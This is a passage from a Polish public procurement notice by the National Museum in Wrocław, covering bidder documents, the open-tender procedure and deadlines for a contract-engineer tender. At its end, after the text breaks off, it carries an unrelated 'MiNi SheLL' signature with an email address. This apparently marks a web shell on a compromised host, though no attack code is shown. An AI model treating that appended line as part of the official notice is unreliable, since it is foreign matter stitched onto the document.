inny dokumentu ubezpieczeniowy) winna być doręczona Zamawiającemu nie później niż w dniu podpisania umowy. 
(w przypadku składania oferty przez wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia, oświadczenie stanowiące załącznik nr 5 do oferty składa pełnomocnik konsorcjum).

II. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów §2 Rozporządzenia Prezesa rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z nr 87 z 2006 r. poz. 605 z późniejszymi zmianami). 

Uwaga - dokumenty złożone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

III. Forma dokumentów: wszystkie dokumenty (z wyjątkiem pełnomocnictwa, które Wykonawca składa w oryginale) muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (poświadczenie za zgodność z oryginałem musi być dokonane przez osoby upoważnione do reprezentowania wykonawcy). Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mnwr.art.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław
Dział administracyjno-gospodarczy  Muzeum Narodowego..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50-153 Wrocław
Dział administracyjno-gospodarczy  Muzeum Narodowego, pokój nr 3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inżynier Kontraktu będzie wykonywał swoje usługi w ramach Projektu zatytułowanego: Przebudowa poddasza nieużytkowego budynku głównego Muzeum Narodowego we Wrocławiu na prezentacje kolekcji sztuki współczesnej z uwzględnieniem dużego

Creat By MiNi SheLL
Email: jattceo@gmail.com